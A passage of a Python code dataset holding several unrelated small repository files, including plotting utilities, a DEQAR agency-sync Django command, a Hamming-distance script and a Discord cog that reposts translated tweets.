['o', '*', '+', 'P', 'X', 'D']\n is_3d = len(axis_labels) == 3\n\n sp = self._get_next_plot(projection='3d') if is_3d else self._get_next_plot()\n\n rand_color = randomcolor.RandomColor()\n limits = [[100000, -100000], [100000, -100000], [100000, -100000]]\n marker_id = 0\n for data in args:\n data = list(data)\n values = data[:-1]\n label = data[-1]\n color = rand_color.generate()[0]\n for i, v in enumerate(values):\n limits[i][0] = min(limits[i][0], min(v))\n limits[i][1] = max(limits[i][1], max(v))\n\n sp.scatter(*values, label=label, color=color, marker=markers[marker_id % len(markers)])\n marker_id += 1\n\n if is_3d:\n x_label, y_label, z_label = axis_labels\n else:\n x_label, y_label = axis_labels\n\n sp.set_xlim(limits[0])\n sp.set_xlabel(x_label)\n sp.set_ylim(limits[1])\n sp.set_ylabel(y_label)\n if is_3d:\n sp.set_zlim(limits[2])\n sp.set_zlabel(z_label)\n sp.legend(loc='upper right')\n sp.set_title(title)\n\n return self\n\n def create_histograms(self, pd_categoricals, titles, bins='auto', fig_size=(13, 6)):\n \"\"\"\n Creates a histogram based on x_data\n \"\"\"\n fig, ax = plt.subplots(figsize=fig_size)\n self.__figures.append(fig)\n subplot_no = len(pd_categoricals)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_yaxis().set_visible(False)\n\n colors = {}\n for i in range(len(pd_categoricals)):\n data = pd_categoricals[i]\n if isinstance(data, 
pd.core.series.Series):\n data = data[data.isnull() == False].value_counts()\n else:\n data, labels = data\n class_id, data = np.unique(data, return_counts=True)\n sort_freq = np.argsort(-data)\n data = dict(zip([labels[c] for c in class_id[sort_freq]], data[sort_freq]))\n\n labels = [name for name in data.keys()]\n data = [data[name] for name in labels]\n if len(colors) != len(labels):\n colors = dict(zip(labels, randomcolor.RandomColor().generate(count=len(labels))))\n\n sp = fig.add_subplot(1, subplot_no, i + 1)\n plt.bar(labels, data, color=[colors[l] for l in labels])\n plt.xticks(labels, rotation=90)\n sp.set_title(titles[i])\n plt.tight_layout()\n\n return self\n\n def create_images(self, images, titles, **kwargs):\n \"\"\"\n Creates a grid of images\n \"\"\"\n subplot_cols = min(len(images), 6)\n subplot_rows = math.ceil(len(images) / subplot_cols)\n fig_size = kwargs.pop('figsize', 3)\n dpi = kwargs.pop('dpi', 80)\n\n fig = plt.figure(figsize=(subplot_cols * fig_size, subplot_rows * fig_size), dpi=dpi)\n self.__figures.append(fig)\n\n if len(images) != len(titles):\n raise(Exception(\"Image and title list must be the same\"))\n\n for i in range(len(images)):\n sp = fig.add_subplot(subplot_rows, subplot_cols, i + 1)\n sp.set_title(titles[i])\n image = images[i]\n if isinstance(image, str):\n image = Image.load(image)\n plt.imshow(Image.to_image(image), **kwargs)\n sp.axes.get_xaxis().set_visible(False)\n sp.axes.get_yaxis().set_visible(False)\n sp.grid(None)\n plt.tight_layout()\n\n return self\n\n # https://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html\n def create_confusion_matrix(self, y_true, y_pred, classes, title=None,\n x_label='Predicted class', y_label='True class', normalize=False, cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n fig, ax = plt.subplots(figsize=(8, 8))\n self.__figures.append(fig)\n\n if not title:\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred, labels=np.array(range(len(classes))))\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n # ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...and label them with the respective list entries\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel=y_label,\n xlabel=x_label)\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n ax.spines['bottom'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.tick_params(axis='both', which='major', pad=10)\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, format(cm[i, j], fmt),\n ha=\"center\", va=\"center\",\n color=\"green\" if i == j else \"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n\n return self\n\n # https://scikit-learn.org/stable/auto_examples/model_selection/plot_roc.html\n def create_roc_curve_multiclass(self, y_true_labels, y_predicted_scores, classes, plot_mask=False):\n \"\"\"\n Compute ROC curve and ROC area for each class\n classes contains a 
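# --- editor's note: an illustrative usage sketch for the PlotBuilder above (assumed,
# --- not taken from the original repo): lay out a 1x2 grid, draw one line plot per
# --- panel, then render and release the figures; the sample data is made up.
builder = PlotBuilder()
builder.create_subplots(1, 2, fig_size=(12, 6))
builder.create_plot("loss", ([0, 1, 2], "epoch"), ([0.9, 0.5, 0.3], "train loss"))
builder.create_plot("accuracy", ([0, 1, 2], "epoch"), ([0.4, 0.7, 0.8], "train acc"))
builder.show()  # calls plt.show() and then closes the figures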
list of target label names in the multiclass clasification\n plot_mask can contain a list of True/False values for each of the above class to be predicted\n \"\"\"\n\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n if not plot_mask:\n plot_mask = classes != None\n\n for i in range(len(classes)):\n if plot_mask[i]:\n fpr[i], tpr[i], _ = roc_curve(y_true_labels, y_predicted_scores[:, i], pos_label=i)\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # https://datascience.stackexchange.com/questions/15989/micro-average-vs-macro-average-performance-in-a-multiclass-classification-settin\n # Compute micro-average ROC curve and ROC area for all classes\n y_true_micro = np.array([], dtype=np.int32)\n y_scores_micro = np.array([], dtype=np.float64)\n for i in range(len(classes)):\n if plot_mask[i]:\n y_true_micro = np.append(y_true_micro, y_true_labels == i)\n y_scores_micro = np.append(y_scores_micro, y_predicted_scores[:, i])\n\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_true_micro, y_scores_micro)\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n self.__plot_roc_curve(fpr, tpr, roc_auc, classes)\n\n return self\n\n def __plot_roc_curve(self, fpr, tpr, roc_auc, classes):\n self.__figures.append(plt.figure(figsize=(15, 15)))\n\n rand_color = randomcolor.RandomColor()\n for i, c in enumerate(classes):\n if i in fpr:\n plt.plot(fpr[i], tpr[i], label='ROC curve [class=%s] (area = %0.2f)' % (c, roc_auc[i]),\n color=rand_color.generate()[0], linewidth=2)\n\n if 'micro' in fpr:\n plt.plot(fpr['micro'], tpr['micro'], label='ROC curve Micro Average (area = %0.2f)' % roc_auc['micro'],\n color='deeppink', linewidth=4, linestyle=':')\n if 'macro' in fpr:\n plt.plot(fpr['macro'], tpr['macro'], label='ROC curve Macro Average (area = %0.2f)' % roc_auc['macro'],\n color='darkorange', linewidth=4, linestyle=':')\n\n plt.plot([0, 1], [0, 1], color='navy', linewidth=2, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('Recall (False Positive Rate)')\n plt.ylabel('Precision (True Positive Rate)')\n plt.title('Receiver operating characteristic')\n plt.legend(loc=\"lower right\")\n","repo_name":"glypher/pokemons","sub_path":"matmih/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":12685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1056777654","text":"class Klass:\n def __init__(self, name):\n self.name = name\n self.parents = []\n self.attributes = []\n self.operations = []\n \n def add_parent(self, name):\n self.parents.append(name)\n \n def add_attribute(self, _type, name):\n self.attributes.append((name, _type))\n \n def add_operation(self, return_type, name, args):\n self.operations.append((name, args, return_type))\n \n def _name_out(self):\n return self.name\n \n def _attribute_out(self):\n ret = []\n for a in self.attributes:\n astr = a[0] + ' : ' + a[1] + '\\\\l'\n ret.append(astr)\n return \"\".join(ret)\n \n def _operation_out(self):\n ret = []\n for o in self.operations:\n ostr = o[0] + '('\n if o[1]:\n for arg in o[1].split(', '):\n arg = arg.strip()\n s = arg.split(' ')\n if len(s) == 2:\n ostr += s[1] + ' : ' + s[0]\n else:\n ostr += s[2] + ' : ' + s[0] + ' ' + s[1]\n ostr += ', '\n ostr = ostr[:-2]\n ostr += ') : ' + o[2] + '\\\\l'\n ret.append(ostr)\n return \"\".join(ret)\n \n def uml_out(self):\n return \"\"\"\\t%(name)s [\\n\\t\\tlabel = \"{%(name)s|%(attributes)s|%(operations)s}\"\\n\\t]\"\"\" % \\\n {'name': self._name_out(), 'attributes': self._attribute_out(), 'operations': 
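# --- editor's note: __plot_roc_curve above knows how to draw a 'macro' curve, but
# --- create_roc_curve_multiclass never computes one; a sketch in the style of the
# --- scikit-learn docs (an assumption, not code from this file) that would fill it in:
import numpy as np
from sklearn.metrics import auc

def add_macro_average(fpr, tpr, roc_auc):
    # average the per-class curves over one shared false-positive-rate grid
    class_keys = [k for k in fpr if isinstance(k, int)]
    all_fpr = np.unique(np.concatenate([fpr[k] for k in class_keys]))
    mean_tpr = np.zeros_like(all_fpr)
    for k in class_keys:
        mean_tpr += np.interp(all_fpr, fpr[k], tpr[k])  # interpolate each class curve
    mean_tpr /= len(class_keys)
    fpr['macro'], tpr['macro'] = all_fpr, mean_tpr
    roc_auc['macro'] = auc(all_fpr, mean_tpr)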
self._operation_out()}\n \n def parents_out(self):\n ret = []\n for parent in self.parents:\n parent = parent.strip()\n if parent:\n pstr = '\\t' + self.name + ' -> ' + parent + '\\n'\n ret.append(pstr)\n return \"\".join(ret)\n","repo_name":"ukscone/code","sub_path":"uml/old/klass.py","file_name":"klass.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32999414086","text":"from datetime import date, datetime, timezone\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.models import Value\nfrom django.db.models.functions import Concat\nfrom django.utils.html import escape\n\nimport deqarclient.agency\nfrom deqarclient.api import EqarApi\nfrom deqarclient.errors import HttpError\n\nfrom agencies.models import RegisteredAgency\nfrom contacts.models import Contact, ContactOrganisation\n\nimport phonenumbers\n\nimport json\n\nclass RemoteAgency(deqarclient.agency.Agency):\n\n def __init__(self, api, pk, command):\n self.command = command\n self.name_primary = None\n self.acronym_primary = None\n self.is_changed = False\n super().__init__(api, pk)\n\n def update(self, local):\n self.update_address(local)\n self.update_contact_names(local)\n self.update_contact_emails(local)\n self.update_contact_phones(local)\n\n def update_address(self, local):\n # postal address\n local_address = '
<p>\n    ' + \\\n '<br/>\n    '.join([ escape(line) for line in [\n local.instance.organisation.address1,\n local.instance.organisation.address2,\n f'{local.instance.organisation.postcode} {local.instance.organisation.city}',\n ] if line ]) + \\\n '\n</p>\n
    '\n if self.data['address'] != local_address:\n self.command.stdout.write(self.command.style.SUCCESS(f' > address: {\"; \".join(self.data[\"address\"].splitlines())} -> {\"; \".join(local_address.splitlines())}'))\n self.data['address'] = local_address\n self.is_changed = True\n # country\n local_country = self.api.Countries.get(local.instance.organisation.country.iso3)\n if self.data['country'] != local_country['id']:\n self.command.stdout.write(self.command.style.SUCCESS(f' > country: {self.api.Countries.get(self.data[\"country\"])[\"name_english\"]} -> {local_country[\"name_english\"]}'))\n self.data['country'] = local_country['id']\n self.is_changed = True\n\n def normalize_phone(self, phone):\n try:\n parsed = phonenumbers.parse(phone, 'BE')\n return phonenumbers.format_number(parsed, phonenumbers.PhoneNumberFormat.INTERNATIONAL)\n except phonenumbers.phonenumberutil.NumberParseException:\n return phone\n\n def update_contact_names(self, local):\n # contact person name(s)\n contact_person = ', '.join([ i['contact__person'] for i in local.instance.organisation.contactorganisation_set.filter(nameOnRegister=True).order_by('contact__person').values('contact__person') ]) or 'not applicable'\n if self.data['contact_person'] != contact_person:\n self.command.stdout.write(self.command.style.SUCCESS(f\" > contact: {self.data['contact_person']} -> {contact_person}\"))\n self.data['contact_person'] = contact_person\n self.is_changed = True\n\n def update_contact_emails(self, local):\n # emails\n remote_emails = { i['email']: i for i in self.data['emails'] }\n local_emails = { i['contact__email'] for i in local.instance.organisation.contactorganisation_set.filter(emailOnRegister=True).values('contact__email') if i['contact__email'] }\n for email in list(remote_emails): # list() needed b/c we cannot change the set while iterating over itself\n if email not in local_emails:\n self.command.stdout.write(self.command.style.WARNING(f\" > - {email}\"))\n del remote_emails[email]\n for email in local_emails:\n if email not in remote_emails:\n remote_emails[email] = { 'email': email }\n self.command.stdout.write(self.command.style.SUCCESS(f\" > + {email}\"))\n if self.data[\"emails\"] != list(remote_emails.values()):\n self.data[\"emails\"] = list(remote_emails.values())\n self.is_changed = True\n\n def update_contact_phones(self, local):\n # phone number(s)\n remote_phones = { self.normalize_phone(i['phone']): i for i in self.data['phone_numbers'] }\n local_phones = { i['contact__phone'] for i in local.instance.organisation.contactorganisation_set.filter(phoneOnRegister=True).values('contact__phone') if i['contact__phone'] }\n for phone in list(remote_phones):\n if phone not in local_phones:\n self.command.stdout.write(self.command.style.WARNING(f\" > - {phone}\"))\n del remote_phones[phone]\n for phone in local_phones:\n if phone not in remote_phones:\n remote_phones[phone] = { 'phone': phone }\n self.command.stdout.write(self.command.style.SUCCESS(f\" > + {phone}\"))\n if self.data[\"phone_numbers\"] != list(remote_phones.values()):\n self.data[\"phone_numbers\"] = list(remote_phones.values())\n self.is_changed = True\n\n def save_if_changed(self):\n if self.is_changed:\n self.command.stdout.write(self.command.style.SUCCESS(f' > saving remote: {self.acronym_primary}'))\n try:\n self.save(comment='synchronised by EQAR-DB')\n except:\n self.command.stdout.write(json.dumps(self.data))\n raise\n self.is_changed = False\n else:\n self.command.stdout.write(f' = remote {self.acronym_primary} 
unchanged')\n\n\nclass LocalObject:\n\n def __init__(self, instance, command):\n self.instance = instance\n self.command = command\n self.is_changed = False\n\n def update_property(self, prop, remote_value):\n \"\"\"\n Updates local object's attribute to value remote, if different\n \"\"\"\n if getattr(self.instance, prop) != remote_value:\n self.command.stdout.write(self.command.style.SUCCESS(f' < {prop}: {getattr(self.instance, prop)} -> {remote_value}'))\n setattr(self.instance, prop, remote_value)\n self.is_changed = True\n\n def parse_remote_date(self, remote_value):\n if remote_value:\n return date.fromisoformat(remote_value)\n else:\n return None\n\n def save_if_changed(self):\n if self.is_changed:\n self.command.stdout.write(self.command.style.SUCCESS(f' < saving local: {self.instance}'))\n self.instance.save()\n self.is_changed = False\n else:\n self.command.stdout.write(f' = local {self.instance} unchanged')\n\nclass LocalAgency(LocalObject):\n\n def update(self, remote):\n self.update_property('registered', remote.data['is_registered'])\n self.update_property('registeredSince', self.parse_remote_date(remote.data['registration_start']))\n self.update_property('validUntil', self.parse_remote_date(remote.data['registration_valid_to']))\n self.update_property('shortname', remote.acronym_primary)\n\nclass LocalOrganisation(LocalObject):\n\n def update(self, remote):\n self.update_property('acronym', remote.acronym_primary)\n self.update_property('longname', remote.name_primary)\n\n\nclass AgencySyncer:\n\n def __init__(self, api, local, command):\n self.command = command\n self.local = LocalAgency(local, command)\n self.local_organisation = LocalOrganisation(local.organisation, command)\n self.remote = RemoteAgency(api, local.deqarId, command)\n\n def sync(self):\n self.command.stdout.write(f'- Syncing {self.remote.acronym_primary} (deqar_id={self.remote.id} <-> local_pk={self.local.instance.id}):')\n if self.remote.acronym_primary != self.local.instance.shortname:\n self.command.stdout.write(self.command.style.NOTICE(f' ! 
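# --- editor's note: an illustrative check, not from the original file, of what
# --- normalize_phone above does; the Brussels number used here is made up.
import phonenumbers

n = phonenumbers.parse("022861111", "BE")  # parsed with the Belgian default region
s = phonenumbers.format_number(n, phonenumbers.PhoneNumberFormat.INTERNATIONAL)
# s is now a normalized string such as "+32 2 286 11 11", so differently formatted
# inputs of the same number compare equal after normalization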
acronyms mismatch: remote={self.remote.acronym_primary} != local={self.local.instance.shortname}'))\n self.local.update(self.remote)\n self.local_organisation.update(self.remote)\n self.remote.update(self.local)\n\n def commit(self):\n self.local.save_if_changed()\n self.local_organisation.save_if_changed()\n self.remote.save_if_changed()\n\n\nclass Command(BaseCommand):\n help = 'Synchronise data on registered agencies with DEQAR'\n\n def add_arguments(self, parser):\n parser.add_argument('agency_id', nargs='*', type=int,\n help = 'only synchronise selected agency IDs')\n parser.add_argument(\"-b\", \"--base\",\n help=\"Base URL to the DEQAR admin API (default: DEQAR_BASE from settings.py)\")\n parser.add_argument(\"-t\", \"--token\",\n help=\"DEQAR API token (default: DEQAR_TOKEN from settings.py)\")\n parser.add_argument('-n', '--dry-run', action='store_true',\n help = 'check differences and only tell what would be synchronised')\n\n def handle(self, *args, **options):\n\n try:\n api = EqarApi(options['base'] or settings.DEQAR_BASE, token=(options['token'] or settings.DEQAR_TOKEN), request_timeout=600)\n except:\n raise CommandError('Error connecting to DEQAR API.')\n\n agencies = RegisteredAgency.objects.exclude(deqarId__isnull=True)\n if options['agency_id']:\n agencies = agencies.filter(id__in=options['agency_id'])\n\n for agency in agencies:\n try:\n syncer = AgencySyncer(api, agency, self)\n except HttpError:\n self.stdout.write(self.style.NOTICE(f'- failed to retrieve agency id={agency.deqarId}, skipped.'))\n else:\n syncer.sync()\n if not options['dry_run']:\n syncer.commit()\n\n","repo_name":"EQAR/eqar_db","sub_path":"api/agencies/management/commands/deqarsync.py","file_name":"deqarsync.py","file_ext":"py","file_size_in_byte":9641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2783550525","text":"# Find the roots of the quadratic equation Ax² + Bx + C = 0\n# - With plain math\n# - Using additional libraries*\n\nimport math\n# a = 1\n# b = 2\n# c = 3\n# # d = b**2 - 4*a*c # D<0 - no roots, D=0 - one root, D>0 - two distinct roots\n# def maph (a,b,c): # solving the quadratic: x1,2 = (-b +- sqrt(b**2 - 4ac)) / 2a\n# x1 = (-b + math.sqrt(b**2 - 4*a*c)) / 2*a\n# x2 = (-b - math.sqrt(b**2 - 4*a*c)) / 2*a\n# return x1, x2\n# print (maph(a,b,c))\n\n# second approach, using additional libraries \nprint(\"Введите коэффициенты для уравнения\")\nprint(\"ax^2 + bx + c = 0:\")\na = float(input(\"a = \"))\nb = float(input(\"b = \"))\nc = float(input(\"c = \"))\n\ndef sq_math(a,b,c):\n discr = b ** 2 - 4 * a * c\n if discr > 0:\n x1 = (-b + math.sqrt(discr)) / (2 * a)\n x2 = (-b - math.sqrt(discr)) / (2 * a)\n return x1, x2\n elif discr == 0:\n x = -b / (2 * a)\n return x, x \n else:\n return None, None \nprint (sq_math(a,b,c))\n\n","repo_name":"PrusakovAndrey/py","sub_path":"Seminar_03/03_28_task.py","file_name":"03_28_task.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33233562268","text":"import numpy as np\nfrom timeit import default_timer as timer\n\ndef hamming_distance(s1, s2):\n if len(s1) != len(s2):\n return None\n else:\n distance = 0\n for i in range(len(s1)):\n if s1[i] != s2[i]:\n distance += 1\n return distance\n\ndef triangular_inferior_format(matrix):\n triangular_matrix = []\n for i in range(len(matrix)):\n row = []\n for j in range(len(matrix)):\n if i >= j:\n
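# --- editor's note: a hedged extension sketch, not in the original script: with
# --- cmath the D < 0 branch can return complex roots instead of (None, None).
import cmath

def sq_math_complex(a, b, c):
    d = cmath.sqrt(b ** 2 - 4 * a * c)  # complex sqrt handles any discriminant sign
    return (-b + d) / (2 * a), (-b - d) / (2 * a)

# sq_math_complex(1, 0, 1) -> (1j, -1j)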
row.append(matrix[i][j])\n triangular_matrix.append(row)\n return triangular_matrix\n\ndef get_sequences_from_fasta_file(file_path):\n sequences = []\n line_sequence = 1\n file = open(file_path, 'r')\n for line in file:\n if line_sequence%2 == 0:\n sequences.append(line.replace('\\n', ''))\n line_sequence += 1\n file.close()\n return sequences\n\ndef hamming_distance_matrix(sequences, triangular=True, print_matrix=False):\n num_seqs = len(sequences)\n distance_matrix = np.zeros((num_seqs, num_seqs), dtype=int)\n \n start = timer()\n for i in range(num_seqs):\n for j in range(num_seqs):\n if i != j:\n distance_matrix[i][j] = hamming_distance(sequences[i], sequences[j])\n end = timer()\n hamming_distance_matrix_time = end - start\n\n distance_matrix_triangular = triangular_inferior_format(distance_matrix.tolist())\n \n if print_matrix == True and triangular == False:\n print(distance_matrix)\n if print_matrix == True and triangular == True:\n print(distance_matrix_triangular)\n\n if triangular == True:\n return distance_matrix_triangular, hamming_distance_matrix_time\n else:\n return distance_matrix, hamming_distance_matrix_time\n \n\nif __name__ == '__main__':\n print()\n print(\"\\nSequences from array\")\n print(\"====================\")\n\n # Directly specifying arrays and getting a normal squared matrix\n sequences = [\"ACGTAGGCCT\", \"ATGTAAGACT\", \"TCGAGAGCAC\", \"TCGAAAGCAT\"]\n print(\"Hamming distance matrix for sequences (normal format):\\n\",sequences,\"\\n\")\n m, t = hamming_distance_matrix(sequences, False, True)\n print('\\n Running time: {:.5f} seconds'.format(t))\n print()\n\n # Directly specifying arrays and getting an inferior triangular matrix as BioPython uses\n sequences = [\"ACGT\", \"AGTT\", \"ATCC\", \"GTCA\"]\n print(\"Hamming distance matrix for sequences (inf. triangular format):\\n\",sequences,\"\\n\")\n m, t = hamming_distance_matrix(sequences, True, True)\n print('\\n Running time: {:.5f} seconds'.format(t))\n print()\n\n print(\"\\nSequences from Fasta files\")\n print(\"==========================\")\n\n # From fasta file, reads virus kmers and produces a normal squared matrix\n sequences = get_sequences_from_fasta_file('./fasta-sequences/fasta2.txt')\n print(\"Hamming distance matrix for sequences (normal format):\\n\",sequences,\"\\n\")\n m, t = hamming_distance_matrix(sequences, False, True)\n print('\\n Running time: {:.5f} seconds'.format(t))\n print()\n\n # From fasta file, reads virus kmers and produces an inferior triangular matrix as BioPython uses\n sequences = get_sequences_from_fasta_file('./fasta-sequences/fasta2.txt')\n print(\"Hamming distance matrix for sequences (inf. 
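# --- editor's note: an optional vectorized variant (an assumption, not in the file):
# --- for equal-length ASCII sequences NumPy can replace the per-character loop.
import numpy as np

def hamming_distance_np(s1, s2):
    if len(s1) != len(s2):
        return None
    a = np.frombuffer(s1.encode(), dtype=np.uint8)  # view the bytes as uint8 codes
    b = np.frombuffer(s2.encode(), dtype=np.uint8)
    return int(np.count_nonzero(a != b))

# hamming_distance_np("ACGT", "AGTT") -> 2, matching hamming_distance above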
triangular format):\\n\",sequences,\"\\n\")\n m, t = hamming_distance_matrix(sequences, True, True)\n print('\\n Running time: {:.5f} seconds'.format(t))\n print()\n","repo_name":"fsigs/nmsu-cs516-bioinformatics-project","sub_path":"ps03/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"29641500363","text":"from floodsystem.geo import stations_by_distance\nfrom floodsystem.geo import distance\nfrom floodsystem.stationdata import build_station_list\nimport numpy as np\n\ndef test_distance():\n d1 = distance((0, 180), (0, 0))\n d2 = np.pi * 6371\n assert np.isclose(d1, d2)\n\ndef test_distance_sorter():\n p = (52.2053, 0.1218)\n stations = build_station_list()\n sorted_stations = stations_by_distance(stations, p)\n prev_distance = 0\n for station in sorted_stations:\n assert station[1] >= prev_distance\n prev_distance = station[1]\n","repo_name":"GeorgeSHogg/Lab-Group-79-PartIA-Flood-Warning-System","sub_path":"test_1B.py","file_name":"test_1B.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27111017443","text":"import deepl\nimport tweepy\nimport logging\nimport datetime\nimport dateutil.parser\n\nimport discord\nfrom discord.ext import tasks\nfrom redbot.core import commands, Config\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\n\nlogging.basicConfig(format = '[%(asctime)s] [%(levelname)s] %(name)s: %(message)s', datefmt = '%y-%m-%d %H:%M:%S')\nlog = logging.getLogger(\"red.tweetrepost\")\n\nBaseCog = getattr(commands, \"Cog\", object)\n\n\n# REMEMBER TO SET PARAMETERS BELOW USING THIS COMMAND\n# [p]set api TweetRepost tweet_user,XXXXX webhook_url,XXXXX consumer_key,XXXXX consumer_secret,XXXXX access_token,XXXXX access_token_secret,XXXXX\n\n\nclass TweetRepost(BaseCog):\n \n def __init__(self, bot):\n super().__init__()\n self.bot = bot\n \n self.config = Config.get_conf(self, identifier=4000121212000335, force_registration=True)\n default_global = {\"last_id\": 0}\n self.config.register_global(**default_global)\n \n self.look_for_new_tweets.start()\n \n \n def cog_unload(self):\n self.look_for_new_tweets.cancel()\n \n \n # Look for new tweets code\n @tasks.loop(minutes = 10)\n async def look_for_new_tweets(self):\n \n await self.bot.wait_until_ready()\n \n log.info(\"Looking for new tweets to post...\")\n try:\n api_tokens = await self.bot.get_shared_api_tokens('TweetRepost')\n except:\n return\n auth = tweepy.OAuth1UserHandler(\n api_tokens[\"consumer_key\"], \n api_tokens[\"consumer_secret\"], \n api_tokens[\"access_token\"], \n api_tokens[\"access_token_secret\"]\n )\n api = tweepy.API(auth)\n tweets = api.user_timeline(screen_name = api_tokens['tweet_user'], count = 4, trim_user = True, exclude_replies = True, include_rts = False, tweet_mode = \"extended\")\n to_post = []\n for tweet in tweets:\n # Getting tweet data\n input_data = tweet._json\n # Getting image\n try:\n if \"media\" in input_data[\"entities\"]:\n image = input_data[\"entities\"][\"media\"][0][\"media_url\"]\n else:\n image = None\n except:\n image = None\n # Extracting important data\n to_post.append({\n \"id\": int(tweet.id),\n \"text\": input_data[\"full_text\"],\n \"image\": image,\n \"timestamp\": dateutil.parser.parse(input_data[\"created_at\"]).timestamp(),\n })\n # Last posted tweet check\n last_id = await self.config.last_id()\n to_post.sort(key = lambda x: 
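# --- editor's note: floodsystem.geo.distance is imported above but not shown; a
# --- haversine sketch consistent with test_distance (antipodal points give pi * R),
# --- assuming the project uses an Earth radius of 6371 km.
from math import radians, sin, cos, asin, sqrt

def haversine(p1, p2, r=6371.0):
    lat1, lon1, lat2, lon2 = map(radians, (*p1, *p2))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * r * asin(sqrt(h))  # haversine((0, 180), (0, 0)) == pi * 6371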
x['timestamp']) \n try:\n index = [t[\"id\"] for t in to_post].index(last_id)\n except ValueError:\n index = -1\n if index != -1:\n to_post = to_post[index+1:]\n log.info(f\"Found {str(len(to_post))} new tweet(s). Getting ready to send if needed...\")\n # Webhook Posts\n for post in to_post:\n try:\n translated_text = deepl.translate(source_language = \"EN\", target_language = \"IT\", text = post[\"text\"])\n webhook = DiscordWebhook(url = api_tokens[\"webhook_url\"], rate_limit_retry = True)\n embed = DiscordEmbed(description = translated_text, color='00ABEE')\n embed.set_image(url = post[\"image\"])\n embed.set_timestamp(post[\"timestamp\"])\n embed.set_footer(text = \"Twitter\", icon_url = \"https://media.discordapp.net/attachments/763039440200400917/1000338562631356486/20160903181541Twitter_bird_logo.png\")\n webhook.add_embed(embed)\n webhook.execute()\n await self.config.last_id.set(post[\"id\"])\n except:\n pass\n log.info(\"Waiting for 10 minutes...\")\n\n \n @look_for_new_tweets.error\n async def look_for_new_tweets_error(self, error):\n log.error(\"Error in the task. Restarting the loop...\", exc_info = True)\n return self.look_for_new_tweets.restart()\n\n \ndef setup(bot):\n bot.add_cog(TweetRepost(bot))\n","repo_name":"sskewer/Red-Cogs","sub_path":"tweetrepost/tweetrepost.py","file_name":"tweetrepost.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71002082614","text":"# -*- coding: utf-8 -*-\n\"\"\"@package business.mall.regional\nFetches region information when filling in a shipping address\n\n\"\"\"\n\nfrom business import model as business_model\nfrom db.mall import models as mall_models\n\n\nclass Regional(business_model.Model):\n\t\"\"\"Fetches region information when filling in a shipping address\n\t\"\"\"\n\n\tdef get_all_provinces(self):\n\t\tprovinces = {}\n\t\tfor province in mall_models.Province.select():\n\t\t\tprovinces[province.id] = province.name\n\t\treturn provinces\n\n\tdef get_cities_for_province(self, province_id):\n\t\tcities = {}\n\t\tfor city in mall_models.City.select().dj_where(province_id=province_id):\n\t\t\tcities[city.id] = city.name\n\t\treturn cities\n\n\tdef get_districts_for_city(self, city_id):\n\t\tdistricts = {}\n\t\tfor district in mall_models.District.select().dj_where(city_id=city_id):\n\t\t\tdistricts[district.id] = district.name\n\t\treturn districts\n","repo_name":"chengdg/apiserver","sub_path":"business/mall/regional.py","file_name":"regional.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"38790332929","text":"def gen_fibanoci(n):\n a = 1\n b = 1\n output = []\n for i in range(n):\n output.append(a)\n a, b = b, a + b\n return output\n\n\nfor num in gen_fibanoci(10):\n print(num)\n\n\n# YIELD KEYWORD\nprint(\"\\n YIELD\")\n\n\ndef gencubes(n):\n for num in range(n):\n yield num**3\n\n\nfor x in gencubes(10):\n print(x)\n","repo_name":"Sahira-m/Python","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
